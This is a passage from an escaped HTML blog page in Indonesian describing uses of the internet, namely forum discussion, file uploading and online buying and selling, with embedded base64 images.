AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//2Q==&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
5. &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Berdiskusi.&lt;/b&gt;&lt;/span&gt;&amp;nbsp;Di internet kita juga bisa berdiskusi melalui 
forum. Bisa diskusi tentang pendidikan, politik dan yang lainnya. salah 
satunya yaitu melalui kaskus.&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img alt=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6GIS1HoY9UiogdswHLq_j2G98W0PsShVUuxhCKz5dftMGn_xNCWfCGA-2Z7U3dZttoQWOzDUf7xyJ_SxpJjsvW54OsLH5Czvf32-tP3pNTCn9bdkE0rRz76BqsUtpcKhk0LvyhC7GMAiV/s1600/kaskus1.jpg&quot; class=&quot;decoded&quot; height=&quot;202&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6GIS1HoY9UiogdswHLq_j2G98W0PsShVUuxhCKz5dftMGn_xNCWfCGA-2Z7U3dZttoQWOzDUf7xyJ_SxpJjsvW54OsLH5Czvf32-tP3pNTCn9bdkE0rRz76BqsUtpcKhk0LvyhC7GMAiV/s1600/kaskus1.jpg&quot; width=&quot;320&quot; /&gt; &lt;/div&gt;
&lt;br /&gt;
6. &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Upload File&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;

&lt;div style=&quot;text-align: justify;&quot;&gt;
kelebihan dari jaringan internet adalah kita bisa berbagi apa pun untuk 
semua orang video,gambar maupun arsip. dengan fitur upload kita tidak 
memerlukan jasa kurir untuk mengirim sesuatu berkas atau foto terbaru 
kita. semua&amp;nbsp;disimpan&amp;nbsp;pada sistem storage server bisa di&amp;nbsp;Unduh&amp;nbsp;oleh 
siapapun dan dimanapun.&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;img src=&quot;data:image/jpeg;base64,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&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
7. &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;Jual Beli Online&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
Bukan hanya hiburan yang&amp;nbsp;berkembang&amp;nbsp;dengan internet tetapi bisnis juga 
berkembang dengan semakin banyaknya bisnis online seperti jual 
beli&amp;nbsp;Online&amp;nbsp;yang mulai banyak. dengan jual beli online kita tidak perlu 
repot-repot mencari pembeli atau penjual&amp;nbsp;tinggal&amp;nbsp;konek internet semuanya
 sudah ada bertransaksi pun tidak perlu bertemu tinggal transfer saja 
dengan bank.
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: x-small; font-weight: normal;&quot;&gt;&lt;img src=&quot;data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQSEBQQERQSFBQSFBQVGBYUFRUVFhQVGBgYGBcYFxYYHCYeGRkjGRgZHzIgIycpOC0sFR4xNTAqNiYrLCkBCQoKDgwOGg8PGjUkHyIuNDUxLCwpLS0vKTIrLC0tLywtLCwxLy0sLC0sLCwpNDEsNSwsLy8sLCwsLCwsLDQsNP/AABEIAKkBKgMBIgACEQEDEQH/xAAcAAEAAwADAQEAAAAAAAAAAAAABQYHAwQIAQL/xABNEAACAQMBBQQEBw0HAgYDAAABAgMABBESBQYHITETIkFRFGFxgTJCUlSRocEVFiNicoKSk6KxwtHSCBckM1OjsnPhQ0R0s8PjJTQ1/8QAGwEBAAIDAQEAAAAAAAAAAAAAAAEDAgQFBgf/xAA3EQACAQIEAwYFAwIHAQAAAAAAAQIDEQQSITEFE0FRYXGBkaEGIjKx0RTB4UPwFUJSYpKi8SP/2gAMAwEAAhEDEQA/ANxpSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKUApSlAKUpQClKiJNsn7oJZgd02zzM3r7RUUD9rPtFLmcIOd7dFf0JelKUMBSlKAUpSgFKUoBSlKAUrr3W0I4sdrJGmc41uq5x1xk1+7a5SRQ8bK6nOGUhlODg4I5dRj3UBy0pSgFKUoBSlVneHiDbWUvYzCUvpDdxQRg5xzLDyqG0ty2jRqVpZaau+4s1K4LK7EsSSrnTIiuM9cMARn14Nc9SVtNOzFKUoQKUpQClKUApSlAKUpQClKUApSlAKhtobOlF3FdQsSNPYyxFsBoy2Q655a0Yk+sZGfOD4i78SWPZJAqF5NTEuCQqrgcgCOZJ+r11RX4uXx6GEeyP+ZNVSqRTszt4LhWKrQVWmlZ33fkbfXF6KvadrpGvTo1eOnOcezPOqDu1tHaM8Xpd1cpa22MhjFEGdfMaxhVPgTnPgOea7433snPZLtCVG6ayigZ/KeHR+6slNM1Z4CrCTjH5rb5U2l4uxcJ5tCliCcAnCjJPqAHU+qo/YKXGh3uiuqRyyxrjEKYGmMsPht4k+ZOKoG913tWzHbLdGa3bGJFjhGnPTWAvIHwYcj6sgVFbqcRbxr2BJpu0jkkWNlZUHwzpBBVQQQSDWLqK9mblPhFWeHlUpyjJed9Omq0ZtFKUq04RG7e3jt7KLtrqVY0JwM5JZsZwqgEscA8gK626W9sW0YWngVwiytGNYAJKhTnAJwO941lPG/fGOZvucI5BJbTq7OdOhgYjyGDn/xB1HgaieH3FVdm2rW5t2lLTNJqEgQAFUXGNJ+Tn30JPQ9Kru4u942la+kiMxYkePSX1/Bwc50jz8qrm/XGKKxka2gQXE68n72mOM/JYgEs3mo6eJB5UINFpWBR/wBoC91c4rQj5IWUH6e0P7q0zcLiXBtIFAphnQamiY6sr4sjYGocxnkCM9PGgKV/aJj/AP0W/wDUj/2TVv4MPnY0A8mnH+85+2qv/aGT8FZt5STD6VQ/ZU/wPlzshfxZph+1n7aEmgUrDt8uMF1Je9hst8RqRGpWNJGnkJxldSnu55Ljr18RjVt24biG0DbQn7SbBkkYiNUjGMlRoUDSoHwj1OT0wAIJulYBvZxbvL249H2eZIoi2mMRA9vMfA5A1LnqFXGB1PlH3uzNu2iG6ka+RV7zN6QZNI83QSNge0Y86Eno+sW4xpjaCHzt4/8AnIKmeFXFR7x/QrzT2+CY5AAvagc2VlHIOBz5YBAPIY5xnGhf8ZCfOAD6JH/nVVb6Tu8AdsYvBmlbqzj7n2rMQB6PDzJwPgAVLpICMggjzBzWF7J3Fvr6FJcjs1ULH20hA0jkAigHC8vIV0p7a92VOCS8LHmCpzHIB1/FYeo9MjpWPMaWq0NmXBqVWpKMK6c7v5f2vf8AY9B1173aEcK65pEjXzdgo+kmojczelb62EuAsinTIo6BsZyPxSOY948Kz7b3D+9udoyjUWTOtZpSdIRskIMDqOYwo8M8sirJS0utTl4bBRlWlTxE8mXe/wCxo8W+dkx0i6t8/wDUUfWamFbIyOYNY3tjhDPDC0qSpKUUsUClSQBk6Tk5OPDlXZ4QbyOJjZOxMbqzRg89DrzIXyBXJx5r6zWCqO9pI3K3C6EqEq+FqZlHdNGtu4AJJAA5knoBVVveJ9hGxXtS5HUxozL+ljB9xNVzjHvA69nZoSBIvaSY+MuSFX2ZDEj1CupuXwujuLZbm5eQdqCUWMhcLnALEg5J6+zFS5vNliRh+H4eGGWJxcmlLZLcsm0+LFokSyQkzMXCmMBkZV+Mx1DwHTzOPWROHeyD0M3ysWhAydIyw5hSCvgQT0rE99N1zYXPY6taModGPXSSRhscsggj6D44rTto3Czbvs6IqA2wOlRhVKkagB5agaxjOTbv0L8Xw7C04UZ0rtTlvfo+m2/83JfdrfeC+d0gEgMahjrUKME45YJqekfAJ8gTWQcFn/xc484c/Q6/zrYHGQR51ZTk5Ruzm8UwsMLiXThtp9il7v8AFCK7uY7ZIZVMmrDMVwNKlugPqqQ3v37hsAFYGSVhlY1IHLpqZj8EZBHQ9OlZNw5Onatv+U4/23FdjipA67TlLZw6xsn5OgLy/ODVTzJZLnclwjDfro0VpHLe193exOrxsk1c7aPT5CRs/Tpx9VXzdHetb+FpUjePQ2ghsEasA90jryI6gdag91YdlXVskSRW5fQAyOqiYNjvHUe83P4wNWfYGwIrOIww50F2fvHJy3hnxwAB7BVkM27d0cviEsIouEKThNPq3t6/32mVcZZs30a/Jt1+ku//AGqC3F2ELu+iicZQZdx5qnPHsJwPfUnxZkztJh8mOIfUT9tcvB+UDaJB+NBIB7dSN+4GqHrU1PT05SpcKUob5PudbiPvQ1zdNApxBbsUVRyBZe6zkePPIHkB6zVQqXudjySX0tsgzIZpgASBkqWJ5n1A1EVhJtu7OnhIU6VKNOn0S9+vnqX7hfvG3a/c6b8JBOrgK3MIdJYgfisAQR54Pnms7bsvQ7+SNCSIJsrnrgEMufXjFTfCfZpk2ismO7AjuT4ZYFFHt7xP5pqB3pvxPe3EqnKvK+k+ag4U/QBWT+hGlShFY+pGGzis3i3+D0bFIGUMOhAI9h5iv1UJuVe9rs+2fx7JVPtTuH61NTdbid1c+d1YOnOUH0dvQyTjluzbpam9SIC4kuIleTLZZdDLjBOB8Feg8Kj+CW7FpdW1w1zbxTOk4AMihiFKKcc/DOT76tXHKPOyWPyZoT+0R9tQX9nl/wADeL5SRH6VYfw1JgXneBotl7MuZbWKOERxuyrGoVe1bCqSB172n6KxDhTuwl/tHFx344kaZw3PtG1AKGPiCzaj56SPGtq4o2pk2PeKvMiLX7o2Vz9Smst4BXYXaE0ZIBktzj1lHUkD3En3UBtl5u/bywmCSCJoiMaNCgAfi4HdPkRjFeapw2ydrnQT/hLjkT1aLrg/lRNg+016lry/xRnEu2LzRz/CLHy8WWNIyP0lIoEaR/aCXNnauP8AXI+mNj9lZ3ab9tBsc7OhyrzTStI/TTCyoNCnzYhsnwAx8blpPHW3xsu2B6pcRqf1Mo+yqbwp4bx7RWae4YiOPVEqocN2hQHWT5KGBA8T15DBAm+Au7cDmS+ZleaJuzSP/RBH+YfWwyAfAK3iTi7cYb8xbHuNJwZDHF+a7qG+lcj31jWyr642FtUq4J7M6JFHSaFuYZc+rDL5EYPjWx8SIlvthzSQESKY0uEK/GVGVzj16A3KgKH/AGftlK9zc3LAFoY40TPgZS+oj14THsY+dbg6ggggEEYIPQisH4CbbWK8mtnIHpMa6M+LxljpHrKux/Nrdp51RGd2CqoLMxOAqgZJJ8ABQM8uzr6BtkiPkLa97v5Cy8h+hyrSeNSf4i3bzicfQ3/es2J+6O2cxg4urzK+YjMmcn2RjJ9hrUONq9+1Pmsw+uP+dVVfpZ2eBu2Oh5/Zly4dPnZlsfxGH0Ow+yuDidYLJs2Ykc4tMinyIYA/SpI99cfC2/RtmxRh1Lx9oGUEalzI5GR1GQQa6HFLemFbR7VHVpZSoKqQdChgxLY6ZxjB8/VRtZPIQpVP8TtBaqftm38LFf4LXJFzPH8Vogx9quAPqc1Ib88UXjka2ssAoSrykBu8OqoDy5Hlk58cDxri4NbJbFxdYwCBEh8z8JvcDo+uqZuhNHFtGFrvkqSHXr+K4DBS3skwfdVV2opdp3p4ejXxterJZsiXy9rt/Fich2Ltqde11XQB5jVP2ZP5hcY94FRfDhtO1Lb8px9Mbitf2tvxZwRmQzxPy5JG6u7HwACn6zyrF9z71U2lbyMQq9sMknkobI5ny59aSSi1qTg69bE4evmpqKyu1la+j9S5caNkNrhuwCV09kx+SQSyZ9uph7vXXb3C4jW0dolvcuY3hGkEqzK6Z7uNIOCBywfL6Jrift5raywqI5nbs++oZVGkkkqeRPLkD7fCshsILPQGnluNfPMcUScvL8I7gfVUyeWd0UYKjHGcPjCunaL0cdX9n4akpv8Abxrf3imAMURViTkdTksSSF68ycAeoeeK0y42QbfYUlu3wo7STV6m0lmHuJNUHdjenZ1pKHFrOzDpK7pI6+tUAVQfWOfrrV0uor+zfsXDRzxumfEalKkEdQRnpUw1u76mvxOcqKpUlBxpwa1fV+XmZdwaf/HyDzt3+p462avPWwdqy7MvtbodUZaOSMnGQeoB9wIPjgeBq6bY4zAxlbWF1kYY1SFcIfMKpOo+3Hv6UpzUY2Znxbh1fE4lVKKvGSWt9Cobn93a0A8rgr/yFbRvHutBfRhJ1OVzpdeToT1wfL1HI5Vh26hYbSttedXpMYbVnOS4BznxzV/4j763FpdwpbnSFjLMGXKSFj0OeuAo5g8tR51FNpRdy7imHrVcZSVF2ll3v2XK1vTwxns1aeJhNEneJA0yIPlFfEDzB9eBVk4V76SzO1ncMXKoXjdubYBAZWPxuuQT5H1VCbX4uTT2zwdjGhkRkZwzHusMNpUjkcE9Sa7fCDd2TtmvXUrGqMiE8tbNjJXzUAHn5n1GojbOshniY1ZYCf69LMvpel/b+7EJxU//AKkv5EX/AAFQGwdrNa3MVwvMxsCR8pejL71JHvqwcVR/+Tk/Ii/4CqnDCXZUUEsxCgDqSTgAe+q5fUzs4KMZ4KEZbOKv6Gg8RYOxurfatqeU4VwwHLWoBBI8mQjl+K3nXQ2leR7SMFvbWbpOI0Re/iKNAxZiFC815nvE/Set4g3Vn9D2fA6xsbeYNMGbI7I61KjlhsI/7Ndfbd8+zbWa6ZEFzcyCKML3lhiUERKPDCourHizeVXOO7ex52ji42hTh8043UXmtfVpXS3VtfDTqRO2ruLY9kbKBg93OMyOOqgjGfVyyFHrLe3MK5Li4aR2d2LMxJZmOSSepJrjqiUrnpsHhf08Xmd5S1k+1/hdDZ+Du0Ndk8RPOGVuX4rgMP2tVX2sb4N7T0XkkBPKaPI9bxnI/ZL/AEVslbdJ3ieD41R5WMn36+v83K3xE3fa92bPbx85CFdB0y6MHC+/Gn31gu4u/UuyZ5fwWtZMJJE5MbBkJwc4OlhlgQR416eqG2rubZXL9pcW0Ej/ACmQaj7WHM++rDkFJ3J4qHal61nLBHFE8EhC6i7OwKghmIAwULcgvh1rO96N0bvYt4LiDX2SPqhnUZABz3JPAHBKkHkwz5kD0Dszdu1tudvbwRHpmONFPvYDJqRIzyNAefrvj3evEY1S2jcjHaKGJHrVWYgH259lc3CrhxNcXKX10jJBGwkXtAQ08gOpTg8ygbvFj1xgZycbfFsWBW1rDCrfKEaA/SBmu7Qkz3jhZPJsxVjR3YXERwisxxpkHRQT410eA1lLFa3KyxyR5nVh2iMmQY1GRqAz0rUKUIKDxb3D9Otu2hXNzbglQOssfVo/b4r68j4xqF4Oen2+qyu7Wdbd9TRu6YEb9WU5+K3X1Nn5XLWKUBh2+nBOdJjPs3DxltQi1BJIj1wjMQGUHpzBHIc+tQk+6u3rlewlW8dOXdmmGjl0zqfDfXXoylCbmecM+FY2efSbhlkuSpUaclIVPUKSMsx6FsDlyHUk9jifurPe+j+joG7My6ssq4DaMdTz+CelXulRJZlYvw2Jnhqqqw3Xb4WMdv8Ag1cqR2MsUgwM6tSEHxxyIIz6x7K59j8GZSwN1KioOqxZZj6skAL7eda3Sq+VE6b47jHHLmXjZXOvs/Z6QRLDEoREGFUeA+05558Sap29vC2K7kM8T9jI3N+7qRz8rGQVY+JHXyzk1eaVm4pqzObQxdahU5lOVn9/HtMx2bwVUMDcXBZR1WNNOfzmJ/dUltrhDbSsGhdrfkAVADpyGM4JBB8+fPr51fKVjy47WNuXF8ZKefmO/lb02K9tvZ9tHs3sr3vwwRIC3RiyAKpXByHJ6c/jY6VV9h7h7JuMSQzPKPkGUAj1MoVXHvq2b37qrfwCFpHj0tqBXBG